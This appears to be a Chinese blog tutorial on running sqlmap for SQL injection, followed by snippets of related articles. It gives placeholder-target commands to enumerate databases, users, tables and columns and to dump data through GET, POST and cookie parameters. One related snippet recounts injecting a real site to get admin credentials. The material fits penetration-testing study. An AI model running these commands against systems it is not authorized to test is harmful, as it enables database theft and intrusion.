利用sqlmap实现基本的SQL注入

注入基本上可分为以下三种:
1.get类:sqlmap -u "http://xxx?x=xx"
2.post类: sqlmap -r "xxx.txt"
3.cookie类: sqlmap -u "http://xxx?x=xx" –cookie="x=xx&y=yy" --level=2

一 get类

1,枚举数据库:sqlmap -u "http://xxx?x=xx" --dbs

2,获取当前数据库:sqlmap -u "http://xxx?x=xx" --current-db

3,获取当前用户名:sqlmap -u "http://xxx?x=xx" --current-user

4,枚举表: sqlmap -u "http://xxx?x=xx" -D "库名" --tables

5,枚举字段:sqlmap -u "http://xxx?x=xx" -D "库名" -T "表名" --columns

6,数据dump:sqlmap -u "http://xxx?x=xx" -D "库名" -T "表名" --dump

或者dump指定列:sqlmap -u "http://xxx?x=xx" -D "库名" -T "表名" -C "xx,yy,zz" --dump

二 post类

一般来说,要进行post注入,首先要用burpsuite等工具将要注入的post表单提取出来保存在一个txt文档中,然后开始注入

枚举数据库:sqlmap -r "xxx.txt" --dbs

(PS:其他和get型一样)

三 cookie类

因为默认情况下sqlmap只支持get/post参数的注入测试,但是当使用–level 参数且数值>=2的时候也会检查cookie时面的参数,当>=3的时候将检查User-agent和Referer,因此要进行cookie注入,直接在后面加上 --level 2 即可

枚举数据库:sqlmap -u "http://xxx?x=xx" –cookie="x=xx&y=yy" --level=2 --dbs

四 其他一些常用的参数

--threads 多线程,可以让sqlmap跑得更快

eg: sqlmap -u "http://xxx?x=xx" --threads 10 --dbs

-p 手动指定注入参数

eg: sqlmap -u "http://xxx?x=xx" -p "id" --threads 10 --dbs

--dbms 指定注入的数据库管理系统,当已知目标的数据库管理系统时使用

eg: sqlmap -u "http://xxx?x=xx" -p "id" --dbms "MYSQL" --threads 10 --dbs

时间: 2024-09-29 16:26:17

利用sqlmap实现基本的SQL注入的相关文章

利用HttpApplicaton请求管道防止SQL注入

HttpApplication通过事件管道的方式处理请求,注意对请求的数据过滤filter和根据请求的类型交由相应的处理程序Handler处理. 管道注入由两种一种实现接口IHttpModule,另一种直接Global类中添加方法. SQL注入网站安全的威胁,关防止的方法:一种不允许敏感数据请求,一种将敏感数据重字符串中过滤.要求针对所有的用户请求,所有在BeginRequest事件中处理(也可以说是一种AOP编程). CODE SQL注入处理类 public class SQLInjectio

burpsuite+sqlmap跨登录验证SQL注入

(我操作的系统是kali linux) 1.利用burpsuite代理设置拦截浏览器请求(具体操作步骤可参考:http://www.cnblogs.com/hito/p/4495432.html) 2.拦截完成的请求具体内容在“Proxy--Intercept”中完整展现 3.右键选中-copy to file,保存到桌面(txt格式) 4.应用程序中调用sqlmap,输入命令 sqlmap -r xxx.txt -tfUPass(文件我是放在桌面,直接拖到终端) 就开始扫描第一步拦截的目标链接

sqlmap完成简单的sql注入

扫描目标站点,是否存在注入 --users获取用户名 --dump --tables探测表和数据库信息 跑出来的字段 admin --dump -T admin -C admin,password暴库获取用户名和密码^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

一次对真实网站的SQL注入———SQLmap使用

网上有许多手工注入SQL的例子和语句,非常值得我们学习,手工注入能让我们更加理解网站和数据库的关系,也能明白为什么利用注入语句能发现网站漏洞. 因为我是新手,注入语句还不太熟悉,我这次是手注发现的注点,然后利用SQLmap实现注入,获得管理员账户密码. 网站:http://www.xxxxxx.com/info.php 当我们利用?id=1或者?id=2时,网站介绍部分发生了变化.则发现了注点 接下来利用SQLmap自动化扫描 1.寻找注入点)(也可以利用SQLmap发现注点) 2.发现利用id

通过BurpSuite和sqlmap配合对dvwa进行sql注入测试和用户名密码暴力破解

0x1:工具和环境介绍 dvwa:渗透测试环境 BurpSuite:强大的WEB安全测试工具 sqlmap:强大的sql注入工具 以上工具和环境都在kali linux上安装和配置. 0x2:步骤说明 配置Burp Suite和浏览器. 这一步比较简单,主要是用来抓取用来sql注入的信息. 在Burp中设置proxy代理:127.0.0.1:8080,配置浏览器使用代理,这样浏览器的request信息就可以被Burp抓取了. 抓取登录信息 在Burp的Proxy界面可以抓取到浏览器访问的信息,如

利用SQLmap 拿服务器shell

1.简介 sqlmap是一个自动化的SQL注入工具,其主要功能是扫描,发现并利用给定的URL的SQL注入漏洞,目前支持的数据库是MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2, SQLite, Firebird, Sybase和SAP MaxDB.采用五种独特的SQL注入技术,分别是: 1)基于布尔的盲注,即可以根据返回页面判断条件真假的注入. 2)基于时间的盲注,即不能根据页面返回内容判断任何

SQL 注入工具集合

众所周知,SQL注入攻击是最为常见的Web应用程序攻击技术.同时SQL注入攻击所带来的安全破坏也是不可弥补的.以下罗列的10款SQL注入工具可帮助管理员及时检测存在的漏洞. BSQL Hacker BSQL Hacker是由Portcullis实验室开发的,BSQL Hacker 是一个SQL自动注入工具(支持SQL盲注),其设计的目的是希望能对任何的数据库进行SQL溢出注入. BSQL Hacker的适用群体是那些对注入有经验的使用者和那些想进行自动SQL注入的人群.BSQL Hacker可自

通过 HTTP 头进行 SQL 注入(转)

英文原文:DatabaseTube,翻译:开源中国 在漏洞评估和渗透测试中,确定目标应用程序的输入向量是第一步.这篇文章解释了别人是如何通过HTTP头部对你的数据库进行SQL注入攻击的,以及讨论下选择哪种漏洞扫描器测试SQL注入. 作者:Yasser Aboukir, InfoSec Institute 在漏洞评估和渗透测试中,确定目标应用程序的输入向量是第一步.有时,当做web应用程序测试时,SQL注入漏洞的测试用例通常局限于特殊的输入向量GET和POST变量.那么对于其他的HTTP头部参数呢

十大关系数据库SQL注入工具一览

摘要:众所周知,SQL注入攻击是最为常见的Web应用程序攻击技术.同时SQL注入攻击所带来的安全破坏也是不可弥补的.以下罗列的10款SQL工具可帮助管理员及时检测存在的漏洞. BSQL Hacker BSQL Hacker是由Portcullis实验室开发的,BSQL Hacker 是一个SQL自动注入工具(支持SQL盲注),其设计的目的是希望能对任何的数据库进... 众所周知,SQL注入攻击是最为常见的Web应用程序攻击技术.同时SQL注入攻击所带来的安全破坏也是不可弥补的.以下罗列的10款S